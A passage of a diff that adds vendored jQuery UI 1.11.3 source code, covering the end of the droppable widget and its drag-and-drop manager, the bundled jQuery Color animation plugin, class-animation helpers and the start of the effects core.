+		if ( this.accept.call( this.element[ 0 ], ( draggable.currentItem || draggable.element ) ) ) {
+			if ( this.options.activeClass ) {
+				this.element.removeClass( this.options.activeClass );
+			}
+			if ( this.options.hoverClass ) {
+				this.element.removeClass( this.options.hoverClass );
+			}
+			this._trigger( "drop", event, this.ui( draggable ) );
+			return this.element;
+		}
+
+		return false;
+
+	},
+
+	ui: function( c ) {
+		return {
+			draggable: ( c.currentItem || c.element ),
+			helper: c.helper,
+			position: c.position,
+			offset: c.positionAbs
+		};
+	}
+
+});
+
+$.ui.intersect = (function() {
+	function isOverAxis( x, reference, size ) {
+		return ( x >= reference ) && ( x < ( reference + size ) );
+	}
+
+	return function( draggable, droppable, toleranceMode, event ) {
+
+		if ( !droppable.offset ) {
+			return false;
+		}
+
+		var x1 = ( draggable.positionAbs || draggable.position.absolute ).left + draggable.margins.left,
+			y1 = ( draggable.positionAbs || draggable.position.absolute ).top + draggable.margins.top,
+			x2 = x1 + draggable.helperProportions.width,
+			y2 = y1 + draggable.helperProportions.height,
+			l = droppable.offset.left,
+			t = droppable.offset.top,
+			r = l + droppable.proportions().width,
+			b = t + droppable.proportions().height;
+
+		switch ( toleranceMode ) {
+		case "fit":
+			return ( l <= x1 && x2 <= r && t <= y1 && y2 <= b );
+		case "intersect":
+			return ( l < x1 + ( draggable.helperProportions.width / 2 ) && // Right Half
+				x2 - ( draggable.helperProportions.width / 2 ) < r && // Left Half
+				t < y1 + ( draggable.helperProportions.height / 2 ) && // Bottom Half
+				y2 - ( draggable.helperProportions.height / 2 ) < b ); // Top Half
+		case "pointer":
+			return isOverAxis( event.pageY, t, droppable.proportions().height ) && isOverAxis( event.pageX, l, droppable.proportions().width );
+		case "touch":
+			return (
+				( y1 >= t && y1 <= b ) || // Top edge touching
+				( y2 >= t && y2 <= b ) || // Bottom edge touching
+				( y1 < t && y2 > b ) // Surrounded vertically
+			) && (
+				( x1 >= l && x1 <= r ) || // Left edge touching
+				( x2 >= l && x2 <= r ) || // Right edge touching
+				( x1 < l && x2 > r ) // Surrounded horizontally
+			);
+		default:
+			return false;
+		}
+	};
+})();
+
+/*
+	This manager tracks offsets of draggables and droppables
+*/
+$.ui.ddmanager = {
+	current: null,
+	droppables: { "default": [] },
+	prepareOffsets: function( t, event ) {
+
+		var i, j,
+			m = $.ui.ddmanager.droppables[ t.options.scope ] || [],
+			type = event ? event.type : null, // workaround for #2317
+			list = ( t.currentItem || t.element ).find( ":data(ui-droppable)" ).addBack();
+
+		droppablesLoop: for ( i = 0; i < m.length; i++ ) {
+
+			// No disabled and non-accepted
+			if ( m[ i ].options.disabled || ( t && !m[ i ].accept.call( m[ i ].element[ 0 ], ( t.currentItem || t.element ) ) ) ) {
+				continue;
+			}
+
+			// Filter out elements in the current dragged item
+			for ( j = 0; j < list.length; j++ ) {
+				if ( list[ j ] === m[ i ].element[ 0 ] ) {
+					m[ i ].proportions().height = 0;
+					continue droppablesLoop;
+				}
+			}
+
+			m[ i ].visible = m[ i ].element.css( "display" ) !== "none";
+			if ( !m[ i ].visible ) {
+				continue;
+			}
+
+			// Activate the droppable if used directly from draggables
+			if ( type === "mousedown" ) {
+				m[ i ]._activate.call( m[ i ], event );
+			}
+
+			m[ i ].offset = m[ i ].element.offset();
+			m[ i ].proportions({ width: m[ i ].element[ 0 ].offsetWidth, height: m[ i ].element[ 0 ].offsetHeight });
+
+		}
+
+	},
+	drop: function( draggable, event ) {
+
+		var dropped = false;
+		// Create a copy of the droppables in case the list changes during the drop (#9116)
+		$.each( ( $.ui.ddmanager.droppables[ draggable.options.scope ] || [] ).slice(), function() {
+
+			if ( !this.options ) {
+				return;
+			}
+			if ( !this.options.disabled && this.visible && $.ui.intersect( draggable, this, this.options.tolerance, event ) ) {
+				dropped = this._drop.call( this, event ) || dropped;
+			}
+
+			if ( !this.options.disabled && this.visible && this.accept.call( this.element[ 0 ], ( draggable.currentItem || draggable.element ) ) ) {
+				this.isout = true;
+				this.isover = false;
+				this._deactivate.call( this, event );
+			}
+
+		});
+		return dropped;
+
+	},
+	dragStart: function( draggable, event ) {
+		// Listen for scrolling so that if the dragging causes scrolling the position of the droppables can be recalculated (see #5003)
+		draggable.element.parentsUntil( "body" ).bind( "scroll.droppable", function() {
+			if ( !draggable.options.refreshPositions ) {
+				$.ui.ddmanager.prepareOffsets( draggable, event );
+			}
+		});
+	},
+	drag: function( draggable, event ) {
+
+		// If you have a highly dynamic page, you might try this option. It renders positions every time you move the mouse.
+		if ( draggable.options.refreshPositions ) {
+			$.ui.ddmanager.prepareOffsets( draggable, event );
+		}
+
+		// Run through all droppables and check their positions based on specific tolerance options
+		$.each( $.ui.ddmanager.droppables[ draggable.options.scope ] || [], function() {
+
+			if ( this.options.disabled || this.greedyChild || !this.visible ) {
+				return;
+			}
+
+			var parentInstance, scope, parent,
+				intersects = $.ui.intersect( draggable, this, this.options.tolerance, event ),
+				c = !intersects && this.isover ? "isout" : ( intersects && !this.isover ? "isover" : null );
+			if ( !c ) {
+				return;
+			}
+
+			if ( this.options.greedy ) {
+				// find droppable parents with same scope
+				scope = this.options.scope;
+				parent = this.element.parents( ":data(ui-droppable)" ).filter(function() {
+					return $( this ).droppable( "instance" ).options.scope === scope;
+				});
+
+				if ( parent.length ) {
+					parentInstance = $( parent[ 0 ] ).droppable( "instance" );
+					parentInstance.greedyChild = ( c === "isover" );
+				}
+			}
+
+			// we just moved into a greedy child
+			if ( parentInstance && c === "isover" ) {
+				parentInstance.isover = false;
+				parentInstance.isout = true;
+				parentInstance._out.call( parentInstance, event );
+			}
+
+			this[ c ] = true;
+			this[c === "isout" ? "isover" : "isout"] = false;
+			this[c === "isover" ? "_over" : "_out"].call( this, event );
+
+			// we just moved out of a greedy child
+			if ( parentInstance && c === "isout" ) {
+				parentInstance.isout = false;
+				parentInstance.isover = true;
+				parentInstance._over.call( parentInstance, event );
+			}
+		});
+
+	},
+	dragStop: function( draggable, event ) {
+		draggable.element.parentsUntil( "body" ).unbind( "scroll.droppable" );
+		// Call prepareOffsets one final time since IE does not fire return scroll events when overflow was caused by drag (see #5003)
+		if ( !draggable.options.refreshPositions ) {
+			$.ui.ddmanager.prepareOffsets( draggable, event );
+		}
+	}
+};
+
+var droppable = $.ui.droppable;
+
+
+/*!
+ * jQuery UI Effects 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/category/effects-core/
+ */
+
+
+var dataSpace = "ui-effects-",
+
+	// Create a local jQuery because jQuery Color relies on it and the
+	// global may not exist with AMD and a custom build (#10199)
+	jQuery = $;
+
+$.effects = {
+	effect: {}
+};
+
+/*!
+ * jQuery Color Animations v2.1.2
+ * https://github.com/jquery/jquery-color
+ *
+ * Copyright 2014 jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * Date: Wed Jan 16 08:47:09 2013 -0600
+ */
+(function( jQuery, undefined ) {
+
+	var stepHooks = "backgroundColor borderBottomColor borderLeftColor borderRightColor borderTopColor color columnRuleColor outlineColor textDecorationColor textEmphasisColor",
+
+	// plusequals test for += 100 -= 100
+	rplusequals = /^([\-+])=\s*(\d+\.?\d*)/,
+	// a set of RE's that can match strings and generate color tuples.
+	stringParsers = [ {
+			re: /rgba?\(\s*(\d{1,3})\s*,\s*(\d{1,3})\s*,\s*(\d{1,3})\s*(?:,\s*(\d?(?:\.\d+)?)\s*)?\)/,
+			parse: function( execResult ) {
+				return [
+					execResult[ 1 ],
+					execResult[ 2 ],
+					execResult[ 3 ],
+					execResult[ 4 ]
+				];
+			}
+		}, {
+			re: /rgba?\(\s*(\d+(?:\.\d+)?)\%\s*,\s*(\d+(?:\.\d+)?)\%\s*,\s*(\d+(?:\.\d+)?)\%\s*(?:,\s*(\d?(?:\.\d+)?)\s*)?\)/,
+			parse: function( execResult ) {
+				return [
+					execResult[ 1 ] * 2.55,
+					execResult[ 2 ] * 2.55,
+					execResult[ 3 ] * 2.55,
+					execResult[ 4 ]
+				];
+			}
+		}, {
+			// this regex ignores A-F because it's compared against an already lowercased string
+			re: /#([a-f0-9]{2})([a-f0-9]{2})([a-f0-9]{2})/,
+			parse: function( execResult ) {
+				return [
+					parseInt( execResult[ 1 ], 16 ),
+					parseInt( execResult[ 2 ], 16 ),
+					parseInt( execResult[ 3 ], 16 )
+				];
+			}
+		}, {
+			// this regex ignores A-F because it's compared against an already lowercased string
+			re: /#([a-f0-9])([a-f0-9])([a-f0-9])/,
+			parse: function( execResult ) {
+				return [
+					parseInt( execResult[ 1 ] + execResult[ 1 ], 16 ),
+					parseInt( execResult[ 2 ] + execResult[ 2 ], 16 ),
+					parseInt( execResult[ 3 ] + execResult[ 3 ], 16 )
+				];
+			}
+		}, {
+			re: /hsla?\(\s*(\d+(?:\.\d+)?)\s*,\s*(\d+(?:\.\d+)?)\%\s*,\s*(\d+(?:\.\d+)?)\%\s*(?:,\s*(\d?(?:\.\d+)?)\s*)?\)/,
+			space: "hsla",
+			parse: function( execResult ) {
+				return [
+					execResult[ 1 ],
+					execResult[ 2 ] / 100,
+					execResult[ 3 ] / 100,
+					execResult[ 4 ]
+				];
+			}
+		} ],
+
+	// jQuery.Color( )
+	color = jQuery.Color = function( color, green, blue, alpha ) {
+		return new jQuery.Color.fn.parse( color, green, blue, alpha );
+	},
+	spaces = {
+		rgba: {
+			props: {
+				red: {
+					idx: 0,
+					type: "byte"
+				},
+				green: {
+					idx: 1,
+					type: "byte"
+				},
+				blue: {
+					idx: 2,
+					type: "byte"
+				}
+			}
+		},
+
+		hsla: {
+			props: {
+				hue: {
+					idx: 0,
+					type: "degrees"
+				},
+				saturation: {
+					idx: 1,
+					type: "percent"
+				},
+				lightness: {
+					idx: 2,
+					type: "percent"
+				}
+			}
+		}
+	},
+	propTypes = {
+		"byte": {
+			floor: true,
+			max: 255
+		},
+		"percent": {
+			max: 1
+		},
+		"degrees": {
+			mod: 360,
+			floor: true
+		}
+	},
+	support = color.support = {},
+
+	// element for support tests
+	supportElem = jQuery( "<p>" )[ 0 ],
+
+	// colors = jQuery.Color.names
+	colors,
+
+	// local aliases of functions called often
+	each = jQuery.each;
+
+// determine rgba support immediately
+supportElem.style.cssText = "background-color:rgba(1,1,1,.5)";
+support.rgba = supportElem.style.backgroundColor.indexOf( "rgba" ) > -1;
+
+// define cache name and alpha properties
+// for rgba and hsla spaces
+each( spaces, function( spaceName, space ) {
+	space.cache = "_" + spaceName;
+	space.props.alpha = {
+		idx: 3,
+		type: "percent",
+		def: 1
+	};
+});
+
+function clamp( value, prop, allowEmpty ) {
+	var type = propTypes[ prop.type ] || {};
+
+	if ( value == null ) {
+		return (allowEmpty || !prop.def) ? null : prop.def;
+	}
+
+	// ~~ is an short way of doing floor for positive numbers
+	value = type.floor ? ~~value : parseFloat( value );
+
+	// IE will pass in empty strings as value for alpha,
+	// which will hit this case
+	if ( isNaN( value ) ) {
+		return prop.def;
+	}
+
+	if ( type.mod ) {
+		// we add mod before modding to make sure that negatives values
+		// get converted properly: -10 -> 350
+		return (value + type.mod) % type.mod;
+	}
+
+	// for now all property types without mod have min and max
+	return 0 > value ? 0 : type.max < value ? type.max : value;
+}
+
+function stringParse( string ) {
+	var inst = color(),
+		rgba = inst._rgba = [];
+
+	string = string.toLowerCase();
+
+	each( stringParsers, function( i, parser ) {
+		var parsed,
+			match = parser.re.exec( string ),
+			values = match && parser.parse( match ),
+			spaceName = parser.space || "rgba";
+
+		if ( values ) {
+			parsed = inst[ spaceName ]( values );
+
+			// if this was an rgba parse the assignment might happen twice
+			// oh well....
+			inst[ spaces[ spaceName ].cache ] = parsed[ spaces[ spaceName ].cache ];
+			rgba = inst._rgba = parsed._rgba;
+
+			// exit each( stringParsers ) here because we matched
+			return false;
+		}
+	});
+
+	// Found a stringParser that handled it
+	if ( rgba.length ) {
+
+		// if this came from a parsed string, force "transparent" when alpha is 0
+		// chrome, (and maybe others) return "transparent" as rgba(0,0,0,0)
+		if ( rgba.join() === "0,0,0,0" ) {
+			jQuery.extend( rgba, colors.transparent );
+		}
+		return inst;
+	}
+
+	// named colors
+	return colors[ string ];
+}
+
+color.fn = jQuery.extend( color.prototype, {
+	parse: function( red, green, blue, alpha ) {
+		if ( red === undefined ) {
+			this._rgba = [ null, null, null, null ];
+			return this;
+		}
+		if ( red.jquery || red.nodeType ) {
+			red = jQuery( red ).css( green );
+			green = undefined;
+		}
+
+		var inst = this,
+			type = jQuery.type( red ),
+			rgba = this._rgba = [];
+
+		// more than 1 argument specified - assume ( red, green, blue, alpha )
+		if ( green !== undefined ) {
+			red = [ red, green, blue, alpha ];
+			type = "array";
+		}
+
+		if ( type === "string" ) {
+			return this.parse( stringParse( red ) || colors._default );
+		}
+
+		if ( type === "array" ) {
+			each( spaces.rgba.props, function( key, prop ) {
+				rgba[ prop.idx ] = clamp( red[ prop.idx ], prop );
+			});
+			return this;
+		}
+
+		if ( type === "object" ) {
+			if ( red instanceof color ) {
+				each( spaces, function( spaceName, space ) {
+					if ( red[ space.cache ] ) {
+						inst[ space.cache ] = red[ space.cache ].slice();
+					}
+				});
+			} else {
+				each( spaces, function( spaceName, space ) {
+					var cache = space.cache;
+					each( space.props, function( key, prop ) {
+
+						// if the cache doesn't exist, and we know how to convert
+						if ( !inst[ cache ] && space.to ) {
+
+							// if the value was null, we don't need to copy it
+							// if the key was alpha, we don't need to copy it either
+							if ( key === "alpha" || red[ key ] == null ) {
+								return;
+							}
+							inst[ cache ] = space.to( inst._rgba );
+						}
+
+						// this is the only case where we allow nulls for ALL properties.
+						// call clamp with alwaysAllowEmpty
+						inst[ cache ][ prop.idx ] = clamp( red[ key ], prop, true );
+					});
+
+					// everything defined but alpha?
+					if ( inst[ cache ] && jQuery.inArray( null, inst[ cache ].slice( 0, 3 ) ) < 0 ) {
+						// use the default of 1
+						inst[ cache ][ 3 ] = 1;
+						if ( space.from ) {
+							inst._rgba = space.from( inst[ cache ] );
+						}
+					}
+				});
+			}
+			return this;
+		}
+	},
+	is: function( compare ) {
+		var is = color( compare ),
+			same = true,
+			inst = this;
+
+		each( spaces, function( _, space ) {
+			var localCache,
+				isCache = is[ space.cache ];
+			if (isCache) {
+				localCache = inst[ space.cache ] || space.to && space.to( inst._rgba ) || [];
+				each( space.props, function( _, prop ) {
+					if ( isCache[ prop.idx ] != null ) {
+						same = ( isCache[ prop.idx ] === localCache[ prop.idx ] );
+						return same;
+					}
+				});
+			}
+			return same;
+		});
+		return same;
+	},
+	_space: function() {
+		var used = [],
+			inst = this;
+		each( spaces, function( spaceName, space ) {
+			if ( inst[ space.cache ] ) {
+				used.push( spaceName );
+			}
+		});
+		return used.pop();
+	},
+	transition: function( other, distance ) {
+		var end = color( other ),
+			spaceName = end._space(),
+			space = spaces[ spaceName ],
+			startColor = this.alpha() === 0 ? color( "transparent" ) : this,
+			start = startColor[ space.cache ] || space.to( startColor._rgba ),
+			result = start.slice();
+
+		end = end[ space.cache ];
+		each( space.props, function( key, prop ) {
+			var index = prop.idx,
+				startValue = start[ index ],
+				endValue = end[ index ],
+				type = propTypes[ prop.type ] || {};
+
+			// if null, don't override start value
+			if ( endValue === null ) {
+				return;
+			}
+			// if null - use end
+			if ( startValue === null ) {
+				result[ index ] = endValue;
+			} else {
+				if ( type.mod ) {
+					if ( endValue - startValue > type.mod / 2 ) {
+						startValue += type.mod;
+					} else if ( startValue - endValue > type.mod / 2 ) {
+						startValue -= type.mod;
+					}
+				}
+				result[ index ] = clamp( ( endValue - startValue ) * distance + startValue, prop );
+			}
+		});
+		return this[ spaceName ]( result );
+	},
+	blend: function( opaque ) {
+		// if we are already opaque - return ourself
+		if ( this._rgba[ 3 ] === 1 ) {
+			return this;
+		}
+
+		var rgb = this._rgba.slice(),
+			a = rgb.pop(),
+			blend = color( opaque )._rgba;
+
+		return color( jQuery.map( rgb, function( v, i ) {
+			return ( 1 - a ) * blend[ i ] + a * v;
+		}));
+	},
+	toRgbaString: function() {
+		var prefix = "rgba(",
+			rgba = jQuery.map( this._rgba, function( v, i ) {
+				return v == null ? ( i > 2 ? 1 : 0 ) : v;
+			});
+
+		if ( rgba[ 3 ] === 1 ) {
+			rgba.pop();
+			prefix = "rgb(";
+		}
+
+		return prefix + rgba.join() + ")";
+	},
+	toHslaString: function() {
+		var prefix = "hsla(",
+			hsla = jQuery.map( this.hsla(), function( v, i ) {
+				if ( v == null ) {
+					v = i > 2 ? 1 : 0;
+				}
+
+				// catch 1 and 2
+				if ( i && i < 3 ) {
+					v = Math.round( v * 100 ) + "%";
+				}
+				return v;
+			});
+
+		if ( hsla[ 3 ] === 1 ) {
+			hsla.pop();
+			prefix = "hsl(";
+		}
+		return prefix + hsla.join() + ")";
+	},
+	toHexString: function( includeAlpha ) {
+		var rgba = this._rgba.slice(),
+			alpha = rgba.pop();
+
+		if ( includeAlpha ) {
+			rgba.push( ~~( alpha * 255 ) );
+		}
+
+		return "#" + jQuery.map( rgba, function( v ) {
+
+			// default to 0 when nulls exist
+			v = ( v || 0 ).toString( 16 );
+			return v.length === 1 ? "0" + v : v;
+		}).join("");
+	},
+	toString: function() {
+		return this._rgba[ 3 ] === 0 ? "transparent" : this.toRgbaString();
+	}
+});
+color.fn.parse.prototype = color.fn;
+
+// hsla conversions adapted from:
+// https://code.google.com/p/maashaack/source/browse/packages/graphics/trunk/src/graphics/colors/HUE2RGB.as?r=5021
+
+function hue2rgb( p, q, h ) {
+	h = ( h + 1 ) % 1;
+	if ( h * 6 < 1 ) {
+		return p + ( q - p ) * h * 6;
+	}
+	if ( h * 2 < 1) {
+		return q;
+	}
+	if ( h * 3 < 2 ) {
+		return p + ( q - p ) * ( ( 2 / 3 ) - h ) * 6;
+	}
+	return p;
+}
+
+spaces.hsla.to = function( rgba ) {
+	if ( rgba[ 0 ] == null || rgba[ 1 ] == null || rgba[ 2 ] == null ) {
+		return [ null, null, null, rgba[ 3 ] ];
+	}
+	var r = rgba[ 0 ] / 255,
+		g = rgba[ 1 ] / 255,
+		b = rgba[ 2 ] / 255,
+		a = rgba[ 3 ],
+		max = Math.max( r, g, b ),
+		min = Math.min( r, g, b ),
+		diff = max - min,
+		add = max + min,
+		l = add * 0.5,
+		h, s;
+
+	if ( min === max ) {
+		h = 0;
+	} else if ( r === max ) {
+		h = ( 60 * ( g - b ) / diff ) + 360;
+	} else if ( g === max ) {
+		h = ( 60 * ( b - r ) / diff ) + 120;
+	} else {
+		h = ( 60 * ( r - g ) / diff ) + 240;
+	}
+
+	// chroma (diff) == 0 means greyscale which, by definition, saturation = 0%
+	// otherwise, saturation is based on the ratio of chroma (diff) to lightness (add)
+	if ( diff === 0 ) {
+		s = 0;
+	} else if ( l <= 0.5 ) {
+		s = diff / add;
+	} else {
+		s = diff / ( 2 - add );
+	}
+	return [ Math.round(h) % 360, s, l, a == null ? 1 : a ];
+};
+
+spaces.hsla.from = function( hsla ) {
+	if ( hsla[ 0 ] == null || hsla[ 1 ] == null || hsla[ 2 ] == null ) {
+		return [ null, null, null, hsla[ 3 ] ];
+	}
+	var h = hsla[ 0 ] / 360,
+		s = hsla[ 1 ],
+		l = hsla[ 2 ],
+		a = hsla[ 3 ],
+		q = l <= 0.5 ? l * ( 1 + s ) : l + s - l * s,
+		p = 2 * l - q;
+
+	return [
+		Math.round( hue2rgb( p, q, h + ( 1 / 3 ) ) * 255 ),
+		Math.round( hue2rgb( p, q, h ) * 255 ),
+		Math.round( hue2rgb( p, q, h - ( 1 / 3 ) ) * 255 ),
+		a
+	];
+};
+
+each( spaces, function( spaceName, space ) {
+	var props = space.props,
+		cache = space.cache,
+		to = space.to,
+		from = space.from;
+
+	// makes rgba() and hsla()
+	color.fn[ spaceName ] = function( value ) {
+
+		// generate a cache for this space if it doesn't exist
+		if ( to && !this[ cache ] ) {
+			this[ cache ] = to( this._rgba );
+		}
+		if ( value === undefined ) {
+			return this[ cache ].slice();
+		}
+
+		var ret,
+			type = jQuery.type( value ),
+			arr = ( type === "array" || type === "object" ) ? value : arguments,
+			local = this[ cache ].slice();
+
+		each( props, function( key, prop ) {
+			var val = arr[ type === "object" ? key : prop.idx ];
+			if ( val == null ) {
+				val = local[ prop.idx ];
+			}
+			local[ prop.idx ] = clamp( val, prop );
+		});
+
+		if ( from ) {
+			ret = color( from( local ) );
+			ret[ cache ] = local;
+			return ret;
+		} else {
+			return color( local );
+		}
+	};
+
+	// makes red() green() blue() alpha() hue() saturation() lightness()
+	each( props, function( key, prop ) {
+		// alpha is included in more than one space
+		if ( color.fn[ key ] ) {
+			return;
+		}
+		color.fn[ key ] = function( value ) {
+			var vtype = jQuery.type( value ),
+				fn = ( key === "alpha" ? ( this._hsla ? "hsla" : "rgba" ) : spaceName ),
+				local = this[ fn ](),
+				cur = local[ prop.idx ],
+				match;
+
+			if ( vtype === "undefined" ) {
+				return cur;
+			}
+
+			if ( vtype === "function" ) {
+				value = value.call( this, cur );
+				vtype = jQuery.type( value );
+			}
+			if ( value == null && prop.empty ) {
+				return this;
+			}
+			if ( vtype === "string" ) {
+				match = rplusequals.exec( value );
+				if ( match ) {
+					value = cur + parseFloat( match[ 2 ] ) * ( match[ 1 ] === "+" ? 1 : -1 );
+				}
+			}
+			local[ prop.idx ] = value;
+			return this[ fn ]( local );
+		};
+	});
+});
+
+// add cssHook and .fx.step function for each named hook.
+// accept a space separated string of properties
+color.hook = function( hook ) {
+	var hooks = hook.split( " " );
+	each( hooks, function( i, hook ) {
+		jQuery.cssHooks[ hook ] = {
+			set: function( elem, value ) {
+				var parsed, curElem,
+					backgroundColor = "";
+
+				if ( value !== "transparent" && ( jQuery.type( value ) !== "string" || ( parsed = stringParse( value ) ) ) ) {
+					value = color( parsed || value );
+					if ( !support.rgba && value._rgba[ 3 ] !== 1 ) {
+						curElem = hook === "backgroundColor" ? elem.parentNode : elem;
+						while (
+							(backgroundColor === "" || backgroundColor === "transparent") &&
+							curElem && curElem.style
+						) {
+							try {
+								backgroundColor = jQuery.css( curElem, "backgroundColor" );
+								curElem = curElem.parentNode;
+							} catch ( e ) {
+							}
+						}
+
+						value = value.blend( backgroundColor && backgroundColor !== "transparent" ?
+							backgroundColor :
+							"_default" );
+					}
+
+					value = value.toRgbaString();
+				}
+				try {
+					elem.style[ hook ] = value;
+				} catch ( e ) {
+					// wrapped to prevent IE from throwing errors on "invalid" values like 'auto' or 'inherit'
+				}
+			}
+		};
+		jQuery.fx.step[ hook ] = function( fx ) {
+			if ( !fx.colorInit ) {
+				fx.start = color( fx.elem, hook );
+				fx.end = color( fx.end );
+				fx.colorInit = true;
+			}
+			jQuery.cssHooks[ hook ].set( fx.elem, fx.start.transition( fx.end, fx.pos ) );
+		};
+	});
+
+};
+
+color.hook( stepHooks );
+
+jQuery.cssHooks.borderColor = {
+	expand: function( value ) {
+		var expanded = {};
+
+		each( [ "Top", "Right", "Bottom", "Left" ], function( i, part ) {
+			expanded[ "border" + part + "Color" ] = value;
+		});
+		return expanded;
+	}
+};
+
+// Basic color names only.
+// Usage of any of the other color names requires adding yourself or including
+// jquery.color.svg-names.js.
+colors = jQuery.Color.names = {
+	// 4.1. Basic color keywords
+	aqua: "#00ffff",
+	black: "#000000",
+	blue: "#0000ff",
+	fuchsia: "#ff00ff",
+	gray: "#808080",
+	green: "#008000",
+	lime: "#00ff00",
+	maroon: "#800000",
+	navy: "#000080",
+	olive: "#808000",
+	purple: "#800080",
+	red: "#ff0000",
+	silver: "#c0c0c0",
+	teal: "#008080",
+	white: "#ffffff",
+	yellow: "#ffff00",
+
+	// 4.2.3. "transparent" color keyword
+	transparent: [ null, null, null, 0 ],
+
+	_default: "#ffffff"
+};
+
+})( jQuery );
+
+/******************************************************************************/
+/****************************** CLASS ANIMATIONS ******************************/
+/******************************************************************************/
+(function() {
+
+var classAnimationActions = [ "add", "remove", "toggle" ],
+	shorthandStyles = {
+		border: 1,
+		borderBottom: 1,
+		borderColor: 1,
+		borderLeft: 1,
+		borderRight: 1,
+		borderTop: 1,
+		borderWidth: 1,
+		margin: 1,
+		padding: 1
+	};
+
+$.each([ "borderLeftStyle", "borderRightStyle", "borderBottomStyle", "borderTopStyle" ], function( _, prop ) {
+	$.fx.step[ prop ] = function( fx ) {
+		if ( fx.end !== "none" && !fx.setAttr || fx.pos === 1 && !fx.setAttr ) {
+			jQuery.style( fx.elem, prop, fx.end );
+			fx.setAttr = true;
+		}
+	};
+});
+
+function getElementStyles( elem ) {
+	var key, len,
+		style = elem.ownerDocument.defaultView ?
+			elem.ownerDocument.defaultView.getComputedStyle( elem, null ) :
+			elem.currentStyle,
+		styles = {};
+
+	if ( style && style.length && style[ 0 ] && style[ style[ 0 ] ] ) {
+		len = style.length;
+		while ( len-- ) {
+			key = style[ len ];
+			if ( typeof style[ key ] === "string" ) {
+				styles[ $.camelCase( key ) ] = style[ key ];
+			}
+		}
+	// support: Opera, IE <9
+	} else {
+		for ( key in style ) {
+			if ( typeof style[ key ] === "string" ) {
+				styles[ key ] = style[ key ];
+			}
+		}
+	}
+
+	return styles;
+}
+
+function styleDifference( oldStyle, newStyle ) {
+	var diff = {},
+		name, value;
+
+	for ( name in newStyle ) {
+		value = newStyle[ name ];
+		if ( oldStyle[ name ] !== value ) {
+			if ( !shorthandStyles[ name ] ) {
+				if ( $.fx.step[ name ] || !isNaN( parseFloat( value ) ) ) {
+					diff[ name ] = value;
+				}
+			}
+		}
+	}
+
+	return diff;
+}
+
+// support: jQuery <1.8
+if ( !$.fn.addBack ) {
+	$.fn.addBack = function( selector ) {
+		return this.add( selector == null ?
+			this.prevObject : this.prevObject.filter( selector )
+		);
+	};
+}
+
+$.effects.animateClass = function( value, duration, easing, callback ) {
+	var o = $.speed( duration, easing, callback );
+
+	return this.queue( function() {
+		var animated = $( this ),
+			baseClass = animated.attr( "class" ) || "",
+			applyClassChange,
+			allAnimations = o.children ? animated.find( "*" ).addBack() : animated;
+
+		// map the animated objects to store the original styles.
+		allAnimations = allAnimations.map(function() {
+			var el = $( this );
+			return {
+				el: el,
+				start: getElementStyles( this )
+			};
+		});
+
+		// apply class change
+		applyClassChange = function() {
+			$.each( classAnimationActions, function(i, action) {
+				if ( value[ action ] ) {
+					animated[ action + "Class" ]( value[ action ] );
+				}
+			});
+		};
+		applyClassChange();
+
+		// map all animated objects again - calculate new styles and diff
+		allAnimations = allAnimations.map(function() {
+			this.end = getElementStyles( this.el[ 0 ] );
+			this.diff = styleDifference( this.start, this.end );
+			return this;
+		});
+
+		// apply original class
+		animated.attr( "class", baseClass );
+
+		// map all animated objects again - this time collecting a promise
+		allAnimations = allAnimations.map(function() {
+			var styleInfo = this,
+				dfd = $.Deferred(),
+				opts = $.extend({}, o, {
+					queue: false,
+					complete: function() {
+						dfd.resolve( styleInfo );
+					}
+				});
+
+			this.el.animate( this.diff, opts );
+			return dfd.promise();
+		});
+
+		// once all animations have completed:
+		$.when.apply( $, allAnimations.get() ).done(function() {
+
+			// set the final class
+			applyClassChange();
+
+			// for each animated element,
+			// clear all css properties that were animated
+			$.each( arguments, function() {
+				var el = this.el;
+				$.each( this.diff, function(key) {
+					el.css( key, "" );
+				});
+			});
+
+			// this is guarnteed to be there if you use jQuery.speed()
+			// it also handles dequeuing the next anim...
+			o.complete.call( animated[ 0 ] );
+		});
+	});
+};
+
+$.fn.extend({
+	addClass: (function( orig ) {
+		return function( classNames, speed, easing, callback ) {
+			return speed ?
+				$.effects.animateClass.call( this,
+					{ add: classNames }, speed, easing, callback ) :
+				orig.apply( this, arguments );
+		};
+	})( $.fn.addClass ),
+
+	removeClass: (function( orig ) {
+		return function( classNames, speed, easing, callback ) {
+			return arguments.length > 1 ?
+				$.effects.animateClass.call( this,
+					{ remove: classNames }, speed, easing, callback ) :
+				orig.apply( this, arguments );
+		};
+	})( $.fn.removeClass ),
+
+	toggleClass: (function( orig ) {
+		return function( classNames, force, speed, easing, callback ) {
+			if ( typeof force === "boolean" || force === undefined ) {
+				if ( !speed ) {
+					// without speed parameter
+					return orig.apply( this, arguments );
+				} else {
+					return $.effects.animateClass.call( this,
+						(force ? { add: classNames } : { remove: classNames }),
+						speed, easing, callback );
+				}
+			} else {
+				// without force parameter
+				return $.effects.animateClass.call( this,
+					{ toggle: classNames }, force, speed, easing );
+			}
+		};
+	})( $.fn.toggleClass ),
+
+	switchClass: function( remove, add, speed, easing, callback) {
+		return $.effects.animateClass.call( this, {
+			add: add,
+			remove: remove
+		}, speed, easing, callback );
+	}
+});
+
+})();
+
+/******************************************************************************/
+/*********************************** EFFECTS **********************************/
+/******************************************************************************/
+
+(function() {
+
+$.extend( $.effects, {
+	version: "1.11.3",
+
+	// Saves a set of properties in a data storage
+	save: function( element, set ) {
+		for ( var i = 0; i < set.length; i++ ) {
+			if ( set[ i ] !== null ) {
+				element.data( dataSpace + set[ i ], element[ 0 ].style[ set[ i ] ] );
+			}
+		}
+	},
+
+	// Restores a set of previously saved properties from a data storage
+	restore: function( element, set ) {
+		var val, i;
+		for ( i = 0; i < set.length; i++ ) {
+			if ( set[ i ] !== null ) {
+				val = element.data( dataSpace + set[ i ] );
+				// support: jQuery 1.6.2
+				// http://bugs.jquery.com/ticket/9917
+				// jQuery 1.6.2 incorrectly returns undefined for any falsy value.
+				// We can't differentiate between "" and 0 here, so we just assume
+				// empty string since it's likely to be a more common value...
+				if ( val === undefined ) {
+					val = "";
+				}
+				element.css( set[ i ], val );
+			}
+		}
+	},
+
+	setMode: function( el, mode ) {
+		if (mode === "toggle") {
+			mode = el.is( ":hidden" ) ? "show" : "hide";
+		}
+		return mode;
+	},
+
+	// Translates a [top,left] array into a baseline value
+	// this should be a little more flexible in the future to handle a string & hash
